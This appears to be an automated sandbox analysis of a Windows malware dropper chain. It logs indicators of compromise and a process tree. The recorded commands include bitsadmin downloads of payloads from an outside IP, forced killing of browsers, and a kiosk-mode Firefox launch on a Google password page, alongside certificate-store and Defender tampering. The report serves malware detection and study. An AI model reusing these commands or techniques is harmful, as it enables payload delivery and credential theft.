c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a uxN4wDZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a uxN4wDZ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 2c0e47e036.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2c0e47e036.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SystemCare1.0.exepid Process 2656 SystemCare1.0.exe -
Suspicious behavior: EnumeratesProcesses 50 IoCs
Processes:
BWDAN_file.exeskotes.exenbea1t8.exe2c0e47e036.exebbcd3df87f.exemsiexec.exepowershell.exeSystemCare1.0.exepowershell.exepowershell.exe3313b23224.exeb86d6eea98.exe86270a5637.exebd1341687e.exe3512b11913.exepid Process 1944 BWDAN_file.exe 2724 skotes.exe 2196 nbea1t8.exe 2132 2c0e47e036.exe 2276 bbcd3df87f.exe 2788 msiexec.exe 2788 msiexec.exe 2700 powershell.exe 2656 SystemCare1.0.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2044 powershell.exe 2404 3313b23224.exe 3972 b86d6eea98.exe 3972 b86d6eea98.exe 3972 b86d6eea98.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 3972 b86d6eea98.exe 3972 b86d6eea98.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 3180 86270a5637.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 2360 bd1341687e.exe 1104 3512b11913.exe 1104 3512b11913.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exeTcMBq5M.exedescription pid Process Token: SeRestorePrivilege 2788 msiexec.exe Token: SeTakeOwnershipPrivilege 2788 msiexec.exe Token: SeSecurityPrivilege 2788 msiexec.exe Token: SeCreateTokenPrivilege 1360 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 1360 TcMBq5M.exe Token: SeLockMemoryPrivilege 1360 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 1360 TcMBq5M.exe Token: SeMachineAccountPrivilege 1360 TcMBq5M.exe Token: SeTcbPrivilege 1360 TcMBq5M.exe Token: SeSecurityPrivilege 1360 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 1360 TcMBq5M.exe Token: SeLoadDriverPrivilege 1360 TcMBq5M.exe Token: SeSystemProfilePrivilege 1360 TcMBq5M.exe Token: SeSystemtimePrivilege 1360 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 1360 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 1360 TcMBq5M.exe Token: SeCreatePagefilePrivilege 1360 TcMBq5M.exe Token: SeCreatePermanentPrivilege 1360 TcMBq5M.exe Token: SeBackupPrivilege 1360 TcMBq5M.exe Token: SeRestorePrivilege 1360 TcMBq5M.exe Token: SeShutdownPrivilege 1360 TcMBq5M.exe Token: SeDebugPrivilege 1360 TcMBq5M.exe Token: SeAuditPrivilege 1360 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 1360 TcMBq5M.exe Token: SeChangeNotifyPrivilege 1360 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 1360 TcMBq5M.exe Token: SeUndockPrivilege 1360 TcMBq5M.exe Token: SeSyncAgentPrivilege 1360 TcMBq5M.exe Token: SeEnableDelegationPrivilege 1360 TcMBq5M.exe Token: SeManageVolumePrivilege 1360 TcMBq5M.exe Token: SeImpersonatePrivilege 1360 TcMBq5M.exe Token: SeCreateGlobalPrivilege 1360 TcMBq5M.exe Token: SeCreateTokenPrivilege 1360 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 1360 TcMBq5M.exe Token: SeLockMemoryPrivilege 1360 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 1360 TcMBq5M.exe Token: SeMachineAccountPrivilege 1360 TcMBq5M.exe Token: SeTcbPrivilege 1360 TcMBq5M.exe Token: SeSecurityPrivilege 1360 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 1360 TcMBq5M.exe Token: SeLoadDriverPrivilege 1360 TcMBq5M.exe Token: SeSystemProfilePrivilege 1360 TcMBq5M.exe Token: SeSystemtimePrivilege 1360 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 1360 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 1360 TcMBq5M.exe Token: SeCreatePagefilePrivilege 1360 TcMBq5M.exe Token: SeCreatePermanentPrivilege 1360 TcMBq5M.exe Token: SeBackupPrivilege 1360 TcMBq5M.exe Token: SeRestorePrivilege 1360 TcMBq5M.exe Token: SeShutdownPrivilege 1360 TcMBq5M.exe Token: SeDebugPrivilege 1360 TcMBq5M.exe Token: SeAuditPrivilege 1360 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 1360 TcMBq5M.exe Token: SeChangeNotifyPrivilege 1360 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 1360 TcMBq5M.exe Token: SeUndockPrivilege 1360 TcMBq5M.exe Token: SeSyncAgentPrivilege 1360 TcMBq5M.exe Token: SeEnableDelegationPrivilege 1360 TcMBq5M.exe Token: SeManageVolumePrivilege 1360 TcMBq5M.exe Token: SeImpersonatePrivilege 1360 TcMBq5M.exe Token: SeCreateGlobalPrivilege 1360 TcMBq5M.exe Token: SeCreateTokenPrivilege 1360 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 1360 TcMBq5M.exe Token: SeLockMemoryPrivilege 1360 TcMBq5M.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
Processes:
BWDAN_file.exeTcMBq5M.exemsiexec.exe3313b23224.exefirefox.exepid Process 1944 BWDAN_file.exe 1360 TcMBq5M.exe 604 msiexec.exe 2404 3313b23224.exe 2404 3313b23224.exe 604 msiexec.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2132 firefox.exe 2132 firefox.exe 2132 firefox.exe 2132 firefox.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe -
Suspicious use of SendNotifyMessage 13 IoCs
Processes:
3313b23224.exefirefox.exepid Process 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2132 firefox.exe 2132 firefox.exe 2132 firefox.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe 2404 3313b23224.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
SystemCare1.0.exepid Process 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
BWDAN_file.exeskotes.exetvtC9D3.exeuxN4wDZ.exemsiexec.exeTcMBq5M.exedescription pid Process procid_target PID 1944 wrote to memory of 2724 1944 BWDAN_file.exe 30 PID 1944 wrote to memory of 2724 1944 BWDAN_file.exe 30 PID 1944 wrote to memory of 2724 1944 BWDAN_file.exe 30 PID 1944 wrote to memory of 2724 1944 BWDAN_file.exe 30 PID 2724 wrote to memory of 2196 2724 skotes.exe 33 PID 2724 wrote to memory of 2196 2724 skotes.exe 33 PID 2724 wrote to memory of 2196 2724 skotes.exe 33 PID 2724 wrote to memory of 2196 2724 skotes.exe 33 PID 2724 wrote to memory of 1064 2724 skotes.exe 34 PID 2724 wrote to memory of 1064 2724 skotes.exe 34 PID 2724 wrote to memory of 1064 2724 skotes.exe 34 PID 2724 wrote to memory of 1064 2724 skotes.exe 34 PID 1064 wrote to memory of 2916 1064 tvtC9D3.exe 35 PID 1064 wrote to memory of 2916 1064 tvtC9D3.exe 35 PID 1064 wrote to memory of 2916 1064 tvtC9D3.exe 35 PID 1064 wrote to memory of 2916 1064 tvtC9D3.exe 35 PID 1064 wrote to memory of 288 1064 tvtC9D3.exe 37 PID 1064 wrote to memory of 288 1064 tvtC9D3.exe 37 PID 1064 wrote to memory of 288 1064 tvtC9D3.exe 37 PID 1064 wrote to memory of 288 1064 tvtC9D3.exe 37 PID 2724 wrote to memory of 1792 2724 skotes.exe 39 PID 2724 wrote to memory of 1792 2724 skotes.exe 39 PID 2724 wrote to memory of 1792 2724 skotes.exe 39 PID 2724 wrote to memory of 1792 2724 skotes.exe 39 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 1792 wrote to memory of 2228 1792 uxN4wDZ.exe 41 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2724 wrote to memory of 1360 2724 skotes.exe 42 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 2788 wrote to memory of 1068 2788 msiexec.exe 44 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 1360 wrote to memory of 604 1360 TcMBq5M.exe 45 PID 2724 wrote to memory of 2132 2724 skotes.exe 48 PID 2724 wrote to memory of 2132 2724 skotes.exe 48 PID 2724 wrote to memory of 2132 2724 skotes.exe 48 PID 2724 wrote to memory of 2132 2724 skotes.exe 48 PID 2724 wrote to memory of 2276 2724 skotes.exe 50 PID 2724 wrote to memory of 2276 2724 skotes.exe 50 PID 2724 wrote to memory of 2276 2724 skotes.exe 50 PID 2724 wrote to memory of 2276 2724 skotes.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BWDAN_file.exe"C:\Users\Admin\AppData\Local\Temp\BWDAN_file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2916
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:288
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:1580
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732579255 " AI_EUIMSI=""4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:604
-
-
-
C:\Users\Admin\AppData\Local\Temp\1010059001\2c0e47e036.exe"C:\Users\Admin\AppData\Local\Temp\1010059001\2c0e47e036.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\1010060001\bbcd3df87f.exe"C:\Users\Admin\AppData\Local\Temp\1010060001\bbcd3df87f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\1010061001\3313b23224.exe"C:\Users\Admin\AppData\Local\Temp\1010061001\3313b23224.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2404 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2116
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2224
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2132 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.0.847769839\710065539" -parentBuildID 20221007134813 -prefsHandle 1184 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9faafe4-d6ac-4154-81bf-08cc5864ef1d} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 1268 107f7c58 gpu6⤵PID:1280
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.1.1140785706\1345740971" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a01a87-7b66-4e58-8fce-78025a1af3b0} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 1532 43fce58 socket6⤵PID:1316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.2.1167461886\516190572" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {80f263aa-bd62-4b23-849f-57a5c2b117c3} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 2104 19e59f58 tab6⤵PID:2008
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.3.1467159073\1970812136" -childID 2 -isForBrowser -prefsHandle 2644 -prefMapHandle 2640 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54dbfc32-4461-406d-9324-95e0510541a4} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 2656 e64258 tab6⤵PID:1232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.4.949177024\902380313" -childID 3 -isForBrowser -prefsHandle 3764 -prefMapHandle 3772 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a1fc913-6385-487d-aaac-404557336517} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 3804 1f771858 tab6⤵PID:3440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.5.722502660\52966335" -childID 4 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {870b6051-f9be-442d-a686-a27600ff693d} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 3924 1f773058 tab6⤵PID:3448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2132.6.1654027597\818331604" -childID 5 -isForBrowser -prefsHandle 4100 -prefMapHandle 4104 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d542393e-9d73-4046-9106-e5cbd2b6f2c2} 2132 "\\.\pipe\gecko-crash-server-pipe.2132" 4088 1f772a58 tab6⤵PID:3456
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1010062001\b86d6eea98.exe"C:\Users\Admin\AppData\Local\Temp\1010062001\b86d6eea98.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\1010063001\86270a5637.exe"C:\Users\Admin\AppData\Local\Temp\1010063001\86270a5637.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\1010064001\bd1341687e.exe"C:\Users\Admin\AppData\Local\Temp\1010064001\bd1341687e.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
